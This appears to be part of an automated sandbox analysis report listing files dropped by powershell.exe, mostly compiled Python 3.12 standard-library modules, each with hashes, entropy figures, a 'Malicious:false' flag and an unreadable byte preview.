                              Preview:.........U.f.5.............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...g.d...Z...G.d...d.........Z.d.d...Z.d...Z...e.j...................d.e.j...........................j...................Z.d...Z.d...Z.e.d.k(..rS..e.e.j(..........................d.k(..r...e...e...................y.e.j(..................d.....Z...e.e.........5.Z...e...e.e.e...................d.d.d...........y.y.#.1.s.w...Y.....y.x.Y.w.)..8A lexical analyzer class for simple shell-like syntaxes......N)...deque)...StringIO)...shlex..split..quote..joinc.....................f.....e.Z.d.Z.d.Z.....d.d...Z.e.d...........Z.d...Z.d.d...Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.d...Z.d...Z.y.).r....r....Nc...........................t.........|.t.................r.t.........|.........}.|...|.|._.........|.|._.........n.t.........j...................|._.........d.|._.........|.|._.........|.r.d.|._.........n.d.|._.........d.|._.........d.|._.........|.j...................r.|.x.j...................d.z...c._........
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):68152
                              Entropy (8bit):5.3823700714074585
                              Encrypted:false
                              SSDEEP:1536:97oQz5QIwiqgNAU58upNVc4GhjPy8NbANTp9NBuPasPTzW1D:9rK0WUmSVc23rBuysPfWR
                              MD5:6C2F6FEBB04A6DFB381BB120FEDBEBEF
                              SHA1:A260B61EC72554047BAFAD812C2F8CD25BD9DF6A
                              SHA-256:2A69441E5C337D93C5F194630DF67CA1C438FEE792A9A3366536B996DA81FE8E
                              SHA-512:5577DA41671C407893962A344E8D33C5B7A280F0BED332CF92E0DAE86A82C2A3455CB3146351BAFF69B880A322F7E8FD9B7D94FFAFB0A8EC59A1028B011E3F20
                              Malicious:false
                              Preview:.........U.fM.........................V.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z...d.d.l.Z.[.d.Z...d.d.l.Z.[.d.Z...d.d.l.Z.[.d.Z.e.j...................d.k(..Z.d.x.Z.Z.e.j...................d.k(..r.d.d.l.Z.n.e.r.d.d.l.Z.e.j&..................d.k(..r.d.d.l.Z.n.d.Z.e.r.d.n.d.Z...e.e.d.........x.r...e.j&..................j/..................d.........a.e.x.r.....e.e.d.........Z.d.Z.g.d...Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z ..G.d...d.e.........Z!..G.d...d.e"........Z#..G.d...d.e"........Z$d...Z%d...Z&e.f.d...Z'drd ..Z(d!..Z)d"..Z*d#..Z+d.d$..d%..Z,d.d$..d&..Z-..e.e.d'........r.d.d$..d(..Z.n.d)..Z.d.d$..d*..Z/d.d$..d+..Z0d.d$..d,..Z1d-..Z2..dsd...Z3d.d.e1d.d.f.d/..Z4..e.e.jj..................d0........r.d1..Z6n.d2..Z6d3..Z7d4..Z8e.jr..................e.j...................e.jt..................e.jv..................h.e.jx..................k...x.r2..e.jz..................e.j|..................v.x.r...e.j.............
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):4487
                              Entropy (8bit):4.91388187088506
                              Encrypted:false
                              SSDEEP:96:ZKRC8xzFiPSVtLe7G0DylUkG9jKsDI9j01L1hxj:Zl8XZa7jqA5OS13j
                              MD5:0DD6B6CFE611F9D9F79BE93918182AC2
                              SHA1:1BEED88646E80C9E5680CAE036B98E80A1EC3288
                              SHA-256:1A87CD55F5C7FD05F8D5F9A5C0663D60248EC450211B74EA8266462D77C60CFF
                              SHA-512:590920DDFF01C0BFE02A0B75C7D1EC559C255ED923389B3AAC60072E51F032FECD27A1769A6D80A8C271F2F5490EDDAD8332C7A86417232A2FA7C0A01E37AC49
                              Malicious:false
                              Preview:.........U.f................................d.d.l.Z.d.d.l.....d.d.l.m.Z.....e.........Z...e.j...................d.e.d...............e.j...................d.e.d.............d.e.v.r...e.j...................d.e.d.............d...Z.d...Z.d...Z...e.e.j...........................d...........Z...e.e.j...........................d...........Z.d.e.v.r...e.e.j...........................d...........Z.d.e.v.r...e.e.j...........................d...........Z.d.e.v.r...e.e.j...........................d...........Z.d.e.v.r...e.e.j ..........................d...........Z.[.[.y.)......N)...*)...IntEnum..Signalsc..........................|.j...........................x.r%..|.j...................d.........x.r...|.j...................d...........x.s...|.j...................d.........S.).N..SIG..SIG_..CTRL_)...isupper..startswith....names.... .DC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\signal.py..<lambda>r........sD.........L.L.N....I............'..G.........0G.,G....(........w..'..........
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):41856
                              Entropy (8bit):5.550727636751214
                              Encrypted:false
                              SSDEEP:768:pRuM2Ys/P/XCLPJ99VdpbYb6ilCZlWq4WlvHw+6tD6eb8e:MYS6Pz/bYb6ilolWq/dHx6hJb8e
                              MD5:1B08CBE9B4B37141CCDA121B339FF11C
                              SHA1:C265CF799047F38E5375F095F4C2E7638863A308
                              SHA-256:3BEFCA18A69BDAA963257D93A0A6194F50CA293CDC333EA4804EE4328773AB58
                              SHA-512:B8A3AD01705D37D4F237D43F20CE9B8C9D5BE5C0058D7A9C078CEDC55250B92AAE8E50BCB64E60B1F6D1EA6985FEEE82AA218F4CE0C47A404D9DBC886E3A5FEE
                              Malicious:false
                              Preview:.........U.f...............................d.Z.d.d.l.Z.d.d.l.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.....d.d.l.Z...e.e.d.d.........Z...e.e.d.d.........Z...e.e.d.d.........Z.g.d...Z.e.j!....................e.j"..................e.....................e.j$..................d.e.d...............e.j$..................d.e.d...............e.j$..................d.e.d...............e.j$..................d.e.d.............d.Z.d.Z.d...Z.e.j...................j1..........................j3..................d...........r.i.Z.d.e.d.<...d.e.d.<...d.e.d.<...d.e.d.<...d.e.d <...d!e.d"<...d#e.d$<...d%e.d&<...d'e.d(<...d)e.d*<...d+e.d,<...d-e.d.<...d/e.d0<...d1e.d2<...d3e.d4<...d5e.d6<...d7e.d8<...d9e.d:<...d;e.d<<...d=e.d><...d?e.d@<...dAe.dB<...dCe.dD<...dEe.dF<...dGe.dH<...dIe.dJ<...dKe.dL<...dMe.dN<...dOe.dP<...dQe.dR<...dSe.dT<...dUe.dV<...dWe.dX<...dYe.dZ<...d[e.d\<...d]e.d^<...d_e.d`<...dae.db<...dce.dd<...dee.df<...dge.dh<...die.dj<...dke.dl<...dme.dn<...doe.dp<...dqe.dr<...dse.dt<...du
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):34297
                              Entropy (8bit):5.17864635013288
                              Encrypted:false
                              SSDEEP:768:bBRYOGcZXngkm0o3oV/vEuEmswxZw9HHkql1yjQ:bBRV5VioV/c6ZXqlAM
                              MD5:E70E1F3492EAA190B04409B8C74292DC
                              SHA1:407E7F3F9EF4FB3203DBF8CD33D666A1123A3FF0
                              SHA-256:D7A939932A0B07EAEF71B7215EDE424C5AD155CB22ECECDBBC752704DA28E844
                              SHA-512:BFF85CF44F67C7D757C5024884FD55B568B6FC14C5AAF9BE7DC5708DC26A4DD64750CDC8D115D4E2CEC79B7AD367A99BF1F76CFF783130D1DC792308E7FEFBF8
                              Malicious:false
                              Preview:.........U.f%p........................\.....d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...g.d...Z...e.e.d.........r.e.j...................g.d...............e.e.d.........r/e.j...................g.d...............e.e.d.........r.e.j...................d.d.g.............e.e.d.........r.e.j...................Z.n.e.j ..................Z...G.d...d.........Z...G.d...d.e.........Z...G.d...d.e.........Z...e.e.d.........r...G.d...d.........Z...G.d...d.e.........Z...G.d...d.........Z...G.d...d.........Z...e.e.d.........r...G.d...d.e.e.........Z...G.d...d.e.e.........Z...G.d ..d!e.e.........Z...G.d"..d#e.e.........Z...e.e.d.........rO..G.d$..d%e.........Z...G.d&..d'e.........Z...G.d(..d)e.e.........Z...G.d*..d+e.e.........Z ..e.e.d.........r...G.d,..d.e.e.........Z!..G.d-..d.e.e.........Z"..G.d...d/........Z#..G.d0..d1e#........Z$..G.d2..d3e.........Z%..G.d4..d5e#........Z&y.)6aq...Generic socket server classes...This module tries to capture the various aspects of definin
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):63050
                              Entropy (8bit):5.467934190560158
                              Encrypted:false
                              SSDEEP:1536:G3tlf6qTMThQw06qMwVVk3lyazBcf7D8H:G3t7MFQw0pVk1yazBcI
                              MD5:5A2D54E98BA00444E075CC298B93E36A
                              SHA1:32C2E58B6D07A484CCEB8B2A5EA5BE02EB49664D
                              SHA-256:A7653E17EF4890F1371C9B620DF2BC5E1A7DB0989230BB037EA5B639B8EFAF65
                              SHA-512:135260D3F415ACBBAD5EB4780C3EC36C61C0150D2B9E2402C0F3EE0B8BC61E2F6DF7A0B1C375F9982F1312BC1B3F229C93C2712AB45E5C304C2727A19326F6C6
                              Malicious:false
                              Preview:.........U.fK.........................p.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m Z m!Z!....d.d.l.m"Z"..d.d.l.m$Z$m%Z%m&Z&m'Z'm(Z(m)Z)m*Z*m+Z+m,Z,m-Z-..d.d.l.m.Z.m/Z/....e.j`..................d.e1d...e...............e.j`..................d.e1d...e...............e.j`..................d.e1d...e...............e.j`..................d.e1d...e...............e.j`..................d.e1d...e...............e.j`..................d.e1d...e.............e2jf..................x.Z4e2_4........e2jj..................jm..........................D.....c.i.c.]...\...}.}.|.|.......c.}.}.Z7..e8e2d.d.........Z9..e.e...........G.d...d.................Z:..e.e...........G.d...d.................Z;..e.e...........G.d ..d!................Z<..e.e...........G.d"..d#................Z=e.j|..................d$k(..r.d.d%l.m?Z?m@Z@..d.d&lAmAZAmBZBmCZC..d.d'lAmDZDmEZEmFZF..d.d.lAZGd.d.lH
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):11521
                              Entropy (8bit):5.3296194300586865
                              Encrypted:false
                              SSDEEP:192:JOQtoTT8nApIGjxs15joJ3Xa/ZlqElqwJ8WniaGnOCXGsH:FiTT8nApLj+15joJ3K/fqiqwJ8WvmOCH
                              MD5:FAE67554CB6195691FA063E3D5E78BC4
                              SHA1:403407FADA6B9F30C5ADD0573884FE999979AC60
                              SHA-256:001DE2A63CB95563C330849A574A8A185979A382965B0D450202AB3DA92E5692
                              SHA-512:F9E02B0821C34516534078C81E3DF5FF0F114A40EA51477CC43A4346AEEDC4E9668FC01A085CF3C1C4AA62B84E457B6F4DD24495C9DFB1895D66D5BAF3611193
                              Malicious:false
                              Preview:.........U.f?/..............................d.Z.g.d...Z.d.d.l.Z.d.Z.d.Z.d.Z.e.e.z...Z.d.Z.e.d.z...d.z...Z.d.Z.d.Z.e.e.z...e.z...e.z...Z.d.d...Z.d.d.l.Z.d.d.l.m.Z...i.Z...G.d...d.........Z.e.j)..............................G.d...d.........Z.y.).an...A collection of string constants...Public module variables:..whitespace -- a string containing all ASCII whitespace.ascii_lowercase -- a string containing all ASCII lowercase letters.ascii_uppercase -- a string containing all ASCII uppercase letters.ascii_letters -- a string containing all ASCII letters.digits -- a string containing all ASCII decimal digits.hexdigits -- a string containing all ASCII hexadecimal digits.octdigits -- a string containing all ASCII octal digits.punctuation -- a string containing all ASCII punctuation characters.printable -- a string containing all ASCII characters considered printable..)...ascii_letters..ascii_lowercase..ascii_uppercase..capwords..digits..hexdigits..octdigits..printable..punctuation..whitespace..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):25199
                              Entropy (8bit):5.848310195497802
                              Encrypted:false
                              SSDEEP:768:9roL8qz5Tzc29JmqtvtcNSgJzQENigaIjzEVsWQ82:hyzVtJjckgJzQENipQzEg9
                              MD5:1693B0F8ACF1C2067F5BF403C36645A2
                              SHA1:EDC746BB0095F51C500F4E2AF785AD3122C4B674
                              SHA-256:4EC2C0F397FFE5F0BBBF9C1E461341BAEA0C2C087E740C5856E9EB3066C1B42B
                              SHA-512:C6048CC3738A5BB11CB94EC831F79E7BCA6C8BEB7719C4E20D4BBA26F68443906B506C553380BD1A8CD72891A8D6C72302E0185C73E3F67E7E1FF2BD1A6AB838
                              Malicious:false
                              Preview:.........U.f.3........................F.....d.Z.d.d.l.m.Z...e.j...................d.k(..s.J...d...Z...e.g.d.....e...e.d.d.................z...........Z.d...Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d ..d!d"..d#d$..d%d&..d'd(..d)d*..i.d+d,..d-d...d/d0..d1d...d2d3..d4d5..d6d7..d8d9..d:d;..d<d=..d>d?..d@dA..dBdC..dDdE..dFdG..dHdI..dJdK....i.dLdM..dNdO..dPdQ..dRdS..dTdU..dVdW..dXdY..dZdK..d[dM..d\dO..d]dQ..d^dS..d_dU..d`dW..dadY..dbdc..ddde....i.dfdg..dhdi..djdk..dldm..dndo..dpdq..drdc..dsde..dtdg..dudi..dvdk..dwdm..dxdo..dydq..dzd{..d|d}..d~d.....i.d.d...d.d...d.d...d.d...d.d...d.d{..d.d}..d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d..d.d...d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d....i.d.d..d.d..d.d..d.d..d.d..d.d...d.d...d.d...d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):364
                              Entropy (8bit):5.303390203933865
                              Encrypted:false
                              SSDEEP:6:hSFknDgIGvXhz5EJ0YKyYg6FraMaVkoopnBWWMlA+ein23d6jaeyfUF:hfcI65WJlKvjFrDaVkoeBFMlA+ebIjaY
                              MD5:29AE69BAD548BCB4ADC79ED4BD7F073D
                              SHA1:4CE183AF84F7CB3C428EF87D97C03C871417026D
                              SHA-256:038EF897CE5864486E09285946D54C459421B7D10253565C1E2A13857D78B6A9
                              SHA-512:FB90F1DDDDADD634AF51D8AF4D0CD0A8B5011C754D068410BC723C3F6A442F8BDF8105D69F4F77539C5FFB8C446ECE7DBCD84A2F40483D3B7F54FE4E76FB3E08
                              Malicious:false
                              Preview:.........U.f................................g.d...Z.d.d.l.....d.d.l.m.Z...d.d.l.m.Z...y.).)...calcsize..pack..pack_into..unpack..unpack_from..iter_unpack..Struct..error.....)...*)..._clearcache)...__doc__N)...__all__.._structr....r............DC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\struct.py..<module>r........s...........................r....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 2834750695844772065132563628738740224.000000, slope 174557683800002081645920256.000000
                              Category:dropped
                              Size (bytes):79226
                              Entropy (8bit):5.323542182258046
                              Encrypted:false
                              SSDEEP:1536:XeRXvfdkqsRccnN1EkHlEVqnGMJccTkTGvCVk/Q:XeRXvfeRccNSkTG8ccTkTEo
                              MD5:B0B3A8C118240919D029ECF81BB8CDCC
                              SHA1:B93AB3166B08A29AAC063B811FA7BBC08DD08820
                              SHA-256:0ACA39BFED7B99EE96F37B8A280953432BB2905C47927DB8B9AC89E874E84B3D
                              SHA-512:A0256B2EE570AE6549AEC33583E509AD63F055D2D158B6982BEA59EF9050B1DD8C9CBEA0AA07BA9FC7E12D08AED4D69EB5DDCA81CCD8EC3F72EF8B35F5BDB523
                              Malicious:false
                              Preview:.........U.f=c.............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z...d.d.l.Z.g.d...Z...d.d.l.Z.d.Z.e.j*..................d.v.Z.e.r@d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(m)Z)..e.jU..................g.d.............nYe.rCd.d.l+m,Z-..e.j\..................Z/e.j`..................Z1e.jd..................Z3e.jh..................Z5e.jl..................Z7n.d.Z-d.Z/d.Z1d.Z3d.Z5d.Z7d.d.l8Z8d.d.l9Z9..G.d...d.e:........Z;..G.d...d.e;........Z<..G.d...d.e;........Z=e.r...G.d...d.........Z>..G.d...d.e?........Z@n,..eAe8d.d.........ZB..eCe9d.........r.e9j...................ZEn.e9j...................ZEe.r.d.ZGd...ZHn.g.ZGd...ZHd.ZId.ZJd.ZKd...ZLd...ZMd...ZNd.d ..d!..ZOd"..ZPd.d ..d#..ZQ..G.d$..d%eR........ZSd.d.d.d.d&..d'..ZTd(..ZUd.d.d)..d*..ZVd.d.d)..d+..ZWd,..ZX..eX........ZYd.ZZ..G.d-..d.........Z[y.#.e.$.r...d.Z.Y.....w.x.Y.w.#.e.$.r...d.Z.Y.....w.x.Y.w.)/a....Sub
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):29104
                              Entropy (8bit):5.45302854467781
                              Encrypted:false
                              SSDEEP:384:nmqI3H3Apn9bLSP9ILoCA3PrzDLb1NyhLHfVCIyujjtYqJs/8gzQUIsb+5:TIXAd96qoF3jzXb1EtXUqe/8gzQUIsu
                              MD5:A4DEEE2B42DFA2082ABBFA3506FDBD73
                              SHA1:57751B0F456F3AF669FC931332B02120FA050DC6
                              SHA-256:9FF0E2E2E2DEF116EF659F077625621DED674815EC32AED682DAD9AC265DC6B4
                              SHA-512:0C785F621E17C2C55B62545121304BA261CA7E8C23C24EFA6DBBB7695B5FACFFBF5F6FC0CC51820CF6033B7D30E2852789FE906B0189F14C184F83707C9781E7
                              Malicious:false
                              Preview:.........U.f.|..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...g.d...Z.d.h.Z.d.d.d.d.d.d.d.d.d...d.d.d.d.d.d.d.d.d...d.d.d.d.d.d.d.d.d...d.d.d.d.d.d.d.d.d...d.d.d.d.d.d.d.d.d...d...Z.e.j...................d.k(..r.e.d.....e.d.<...n.e.d.....e.d.<...d...Z...e.........d.u.Z.e.r!e.d.d.d.d.d.d d!d"..d#d#d$d$d%d&d!d"..d'd'd(d(d%d&d!d"..d)..z...Z.d"Z.e.j...................j...........................d.....Z.e.j ..................d.......d*e.j ..................d+........Z.e.j ..................d.......e.j ..................d+........Z.e.j&..................j)..................e.j*..........................Z.e.j&..................j)..................e.j...........................Z.e.j&..................j)..................e.j2..........................Z.e.j&..................j)..................e.j6..........................Z...e.j:..........................Z.d.a.d,a d.Z!d-Z"d.Z#d/Z$d0..Z%e.jL..................r,e.j&..................jO....................e%e.jL............
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):119379
                              Entropy (8bit):5.203683715176227
                              Encrypted:false
                              SSDEEP:1536:tbqJwPjFfRrQJM2jf8C6R8fC9YhjDa05o9im+1grWgEVQ9MtF5xI4LqxeOc73:bQ1a4auoZ+OrJOd5Oc7
                              MD5:BF13009CBB92303F86544F3CE3AFB93B
                              SHA1:0417CB76BF1A37BE043B8E24E95DC0E1B180B92E
                              SHA-256:B501C1264688186CCFFDEE3CB48A21F5FF756B61677FF2818DF5481FAB290DAF
                              SHA-512:60E4A0ECE0B792CFDF985B22B103E1B31793C5A1AFB3B88FFF1C18423DB0123EF580F3A741FF882D4EC5536465A5B0BC68F3BD7D7C947511F7178E8B312C6EB3
                              Malicious:false
                              Preview:.........U.f..............................d.Z.d.Z.d.Z.d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z...d.d.l.Z...d.d.l.Z.e.e.e.f.Z.g.d...Z.d.Z.d.Z.e.d.z...Z.d.Z.d.Z.d.Z.d.Z.d.Z d.Z!d.Z"d.Z#d.Z$d.Z%d.Z&d.Z'd.Z(d.Z)d.Z*d.Z+d.Z,d.Z-d.Z.d.Z/d.Z0d.Z1d.Z2e2Z3e!e"e#e$e'e(e)e%e&e*e+e,f.Z4e!e"e)e,f.Z5e*e+e,f.Z6d.Z7h.d ..Z8e9e9e9e:e:e:d!..Z;e.jx..................d"k(..r.d#Z=n...e.j|..........................Z=d$..Z?d%..Z@d&..ZAd'e3f.d(..ZBd)..ZCd.e.d.f.d*..ZDd+..ZE..G.d,..d-eF........ZG..G.d...d/eG........ZH..G.d0..d1eG........ZI..G.d2..d3eG........ZJ..G.d4..d5eG........ZK..G.d6..d7eG........ZL..G.d8..d9eL........ZM..G.d:..d;eL........ZN..G.d<..d=eL........ZO..G.d>..d?eL........ZP..G.d@..dAeL........ZQ..G.dB..dC........ZR..G.dD..dE........ZS..G.dF..dGeT........ZU..G.dH..dIeT........ZV..G.dJ..dKe.j...........................ZX..G.dL..dMeG........ZY..G.dN..dOeY........ZZ..G.dP..dQeY........Z[..G.dR..dSeY........Z\..G.dT..dUeY........Z]..G.dV..dWeY
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):40437
                              Entropy (8bit):5.12565711835023
                              Encrypted:false
                              SSDEEP:768:de9a0qWQOLdWXoVxP9bZot1vZo/SCN2wR6:depL0oxPy1vitR6
                              MD5:3812EC2492ABD61756A7EACEE6806B5D
                              SHA1:633E5D0171F9F885A43DA816EA44E70FFBA69202
                              SHA-256:BD35D4648368520624541538A9F29018C2A36601B05757B4FD768F10E9D12685
                              SHA-512:E411AA07FA9A63BF723AFF5DF9ADADCCD11B1BDF5C3968AD6DA47CF35992A6C87C39B56E5C0901E224BDB861D397A4C4CDBEF9D1A2B0458E7050C83DAA950FC4
                              Malicious:false
                              Preview:.........U.f................................d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j0..................Z.e.j4..................e.j6..................z...e.j8..................z...Z...e.e.d.........r.e.e.j>..................z...Z.e.Z ..e.e.d.........r.e e.jB..................z...Z ..e.e.d.........r.e.jD..................Z"n.d.Z"d.Z#..e.........Z$d...Z%d...Z&d...Z'..G.d...d.........Z(d...Z)d...Z*d.a+d...Z,d...Z-d...Z.d...Z/d...Z0d...Z1d.a2d...Z3d...Z4d...Z5d.d...Z6d/d...Z7d.e#d.f.d...Z8..G.d...d.........Z9..G.d ..d!........Z:......d0d.d"d#..d$..Z;e.jx..................d%k7..s.e.jz..................d&k(..r.e;Z>n...e.e.d'........a?......d1d.d(..d)..Z>..G.d*..d+e.j...........................ZA..G.d,..d-........ZBy.)2a....Temporary files...This module provides generic, low- and high-level interfaces for.creating temporary files and directories. All of the interfaces.provided by this module can be used without fear of race co
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):18332
                              Entropy (8bit):5.424205464499309
                              Encrypted:false
                              SSDEEP:384:nIBHMRmDM/m8C0l14YpQNjlNfBmVNVICMaO9:nIBrg4tlxWNVan9
                              MD5:5E4561F1DE139BFE136390DC968BE8C4
                              SHA1:FA26CB34234D7F8CEDC7662CE74B7C4225CC249B
                              SHA-256:1AE578CFC17B7BEC919A446F6DB2E6BC479849C891ADAD445C0DFD007E63C08F
                              SHA-512:D30F983F51515788039CE959010EEB91FECB0FE3222AF9B5FCD74C60ADF6D9CF353E54F518D74D2FD78422291626882BC6D6ADCDA5962347F4F1DCBCAFCBBF33
                              Malicious:false
                              Preview:.........U.f.N..............................d.Z.d.d.l.Z.g.d...Z.d.Z...G.d...d.........Z.d.d...Z.d.d...Z.d...Z...e.j...................d.e.j...........................Z...e.j...................d.e.j...........................Z.d...Z.d.d...Z.e.d.k(..r...e...e.d...................y.y.).z.Text wrapping and filling.......N)...TextWrapper..wrap..fill..dedent..indent..shortenz...... c..........................e.Z.d.Z.d.Z.e.j.....................e.e.e...........e.d.................Z.d.Z.d.Z.d...e.j...................e.........z...Z.d.e.d.d...z...Z...e.j ..................d.e.e.e.e.d...z...e.j"..........................Z.[.[.[...e.j ..................d.e.z...........Z.[...e.j ..................d.........Z.....................d.d.d.d...d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.).r....a..... Object for wrapping/filling text. The public interface consists of. the wrap() and fill() methods; the other methods are just there for. subclasses to override in order to tweak the d
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65385
                              Entropy (8bit):5.175842288934097
                              Encrypted:false
                              SSDEEP:1536:pEwZem3bKsKYw107OcVWH4GTtrFZqWBFpK:Fq/H4kBO
                              MD5:1A02150E0C58034FF079FBCB5520DA54
                              SHA1:C244EA24DFCE0CFDD1A0ACF912D6B5E5F0F048B7
                              SHA-256:F9C8DEA22F7BD17CDBDAF9FB4F55A1A61277CD51B864152BC4762E559B700469
                              SHA-512:C53B87550D4BC92AB4C8B81B0650510FAB429A350BD4604B83084470ABC051A9B8629D29A9ADBD8669EB0DF7DB737B60C54E4D0722ADA28FB6CDE006D1DF5C50
                              Malicious:false
                              Preview:.........U.f................................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....d.d.l.m.Z...g.d...Z.e.j*..................Z.e.j...................Z.e.j2..................Z.e.j6..................Z.e.j8..................Z...e.j:..................Z...e.j>..................Z.d.Z e.jC..................d...........e.jD..................Z#..e.jH..................Z%e.jL..................Z&[.d.a'd.a(d...Z)d...Z*d...Z+d...Z,d...Z-d...Z.e.Z/d...Z$..G.d...d.........Z0e0Z1..G.d...d.........Z2..G.d...d.........Z3..G.d...d.e3........Z4..G.d...d.........Z5..G.d...d.........Z6..G.d...d e7........Z8..e.d!........jr..................Z:d"..Z;..e$........a<i.Z=i.Z>..e.........Z?..e.........a@..eA........aBd#..ZC..G.d$..d%........ZD..d.d&l.mEaFmGZH..t.........ZMd-..ZN..G.d...d/eD........ZO..G.d0..d1eD........ZP..G.d2..d3eD........ZQd4..ZRd5..ZSd6..ZTd7..ZUd8..ZVd9..ZWg.ZXd.aYd:..ZZd.d;l.m[Z[....eP........a\d<..Z]d=..Z^..d.d>l.m_Z`..d@..Zb..ece.dA........r...e.j.........
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):3596
                              Entropy (8bit):6.055713200971082
                              Encrypted:false
                              SSDEEP:48:zmHWiYnr6SUOhIlPBJR7zpPrK5Qylp1je6JQm/GY0BW1+kdm+TFoQ0iT6um/n:qHWiKf25n5+5lp9lJQ8GYh+ExQimhn
                              MD5:76A186FAEAF00081C0D52DDB1D5F0C04
                              SHA1:CEF9453949E10911DBFDFF8DCCD01351F3ACE244
                              SHA-256:096C87BF903113E77F8BEC38940B98C662B1567D35E92A3A52FD782671327296
                              SHA-512:D1D186DAD6BF0091994EF4A0F7976800C8D9C86CDCB94C60368DBBCD9653CF9CBA18A5926F2F0154924EF81B4497680CEF4385446668E6D610B65698B7CB5B9B
                              Malicious:false
                              Preview:.........U.f=...............................d.Z.g.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d Z d!Z!d"Z"d#Z#d$Z$d%Z%d&Z&d'Z'd(Z(d)Z)d*Z*d+Z+d,Z,d-Z-d.Z.d/Z/d0Z0d1Z1d2Z2d3Z3d4Z4d5Z5d6Z6d7Z7d8Z8d9Z9d:Z:d;Z;d<Z<d=Z=d>Z>d?Z?d@Z@dAZAdBZBdCZCdDZDdEZEdFZFdGZG..eH........j...........................D.....c.i.c.]"..\...}.}...eJ|.eK........r.|.j...................dH........s.|.|....$..c.}.}.ZMe.j...................eMj.....................................i.dIe8..dJe...dKe...dLe*..dMe...dNe+..dOe...dPe...dQe...dRe%..dSe0..dTe(..dUe...dVe&..dWe...dXe...dYe'..i.dZe5..d[e...d\e6..d]e...d^e1..d_e2..d`e)..dae...dbe7..dce...dde...dee#..dfe...dge...dhe...die...dje.....e e$e/e3e4e.e.e"e-e.e.e,e.e!dk....ZPdl..ZQdm..ZRdn..ZSyoc...c.}.}.w.)pz.Token constants.)...tok_name..ISTERMINAL..ISNONTERMINAL..ISEOF............................................................................................................................
